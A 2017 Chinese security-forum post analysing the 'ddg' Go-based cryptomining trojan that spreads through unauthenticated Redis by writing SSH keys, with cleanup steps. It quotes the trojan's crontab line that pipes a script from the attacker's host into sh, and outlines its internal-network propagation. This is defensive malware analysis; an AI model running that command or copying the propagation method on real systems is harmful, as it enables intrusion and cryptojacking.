冰凌互联IT技术论坛

 找回密码
 注册会员

用360账号登录

只需一步,快速开始

新浪微博登陆

只需一步, 快速开始

搜索
查看: 480|回复: 0

比特币挖矿木马Ddg分析

[复制链接]

升级   100%

  • TA的每日心情
    奋斗
    2017-11-8 18:41
  • 签到天数: 663 天

    [LV.9]以坛为家II

    发表于 2017-3-14 09:01:35 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,您在论坛上的提问我们会快速解答。

    您需要 登录 才可以下载或查看,没有帐号?注册会员 用360账号登录  新浪微博登陆

    x

    引言


    近年来go语言火热,一些恶意软件也闻风而起,然而go程序在编译过程中集成了大量的基础库,并且不同版本格式也存在较大差异,给逆向带来不小的阻力。乐视云安全攻防小组专注于应急事件响应,二进制安全,让我们一起剖析下基于go的恶意软件.

    近日,乐视安全中心接获用户服务器高负载告警,经安全人员协查分析,发现是通过redis漏洞传播的挖矿木马-ddg,大量消耗服务器资源,难以清除并具有内网扩散功能。本文为乐视安全中心对木马具体原理功能及传播方式进行的分析,以及给出的解决方案。


    0x01 木马行为


    登陆被感染服务器,利用top查看CPU使用率,找到CPU消耗进程AnXqV

    通过kill杀死AnXqV进程并进行删除,约15分种后系统告警,AnXqV再次创建并启动

    此时查看crontab定时器发现指令:

    1
    [size=1em]curl -fsSL http://www.haveabitchin.com/pm.sh?223 | sh

    定时下载并执行如下脚本:  


    0x02 木马功能


    ddg.222为golang编写无明显函数符号和字符串特征

    根据编译版本编写辅助脚本还原golang函数符号

    摘要出ddg主要使用到的功能库

    1
    [size=1em]shirou_gopsutil,VividCortex_godaemon,boltdb_bolt,garyburd_redigo,golang_protobuf_proto,hashicorp_yamux,moul_http2curl,parnurzeal_gorequest,satori_go_2euuid

    分别具有启动后台守护进程,监控进程和系统信息(Cpu和内存,网络,机器码,Mac地址等),实现redis客户端操作key/value数据库操作,开启RPC服务远程调用,单TCP多路复用等功能

    分析ddg执行执行过程,首先调用ddg_aaredis__Server_genLanAddress接口获取局域网地址

    调用ddg_aaredis__Server_worker开启扫描,在内网子网掩码内循环调用分别对每个ip测试了ddg_aaredis__Server_testRedis函数

    ddg_aaredis__Server_testRedis函数主要用于测试redis漏洞,通过测试是否可以未授权访问redis并写入公钥登陆来进行扩散

    梳理木马功能:

    1、对可以未授权访问redis的服务器写入公钥登录,定时下载并执行脚本;

    2、脚本下载AnXqV和ddg文件并运行,AnXqV进行挖矿,ddg进行系统监控远程调用并内网传播。


    0x03 清理方案


    根据以上原理对木马进行清除,由于不同版本木马的写入文件名不同,需对照各自木马脚本下载的文件路径和文件名执行以下操作:

    1、设置redis授权访问。

    2、阻断服务器通讯。

    (如iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP)

    3、清除定时器任务。(如systemctl stop crond)

    4、删除木马和未知公钥文件。(如/tmp/ddg.222,/tmp/AnXqV.yam,/tmp/AnXqV,/tmp/AnXqV.noaes等及 ~/.ssh/中未知授权)

    5、终止木马进程。(如pkill AnXqV,pkill ddg.222)




    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册会员 用360账号登录  新浪微博登陆

    本版积分规则

    载入中

    冰凌互联 ( 辽ICP备17007121号 ) 诚信认证  

    GMT+8, 2017-12-16 15:07 , Processed in 1.182191 second(s), 17 queries , Gzip On, Memcache On. 分流加速 On

    阿里云云大使-冰凌网安

    © 2001-2015 冰凌网络信息安全

    快速回复 返回顶部 返回列表